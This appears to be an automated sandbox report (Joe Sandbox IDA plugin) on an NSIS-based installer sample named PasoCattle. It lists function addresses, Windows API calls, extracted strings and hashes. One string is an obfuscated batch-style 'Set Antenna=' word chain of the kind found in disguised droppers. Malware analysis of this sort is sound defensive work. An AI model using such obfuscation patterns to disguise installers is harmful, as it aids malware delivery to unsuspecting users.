Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEd20, xrefs: 00405BC9
"F, xrefs: 00405A4B
.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
RichEd32, xrefs: 00405BD4
_Nb, xrefs: 00405AFD
.exe, xrefs: 00405A69
RichEdit20A, xrefs: 00405BE2, 00405BE7
@jG, xrefs: 00405AF2
RichEdit, xrefs: 00405BF0

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
soft, xrefs: 004036A1
Null, xrefs: 004036AA
Inst, xrefs: 00403698

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

pAB, xrefs: 004033AB
Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
... %d%%, xrefs: 004034C8

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
API String ID: 651206458-1427982325
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
open, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
open, xrefs: 00402770

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

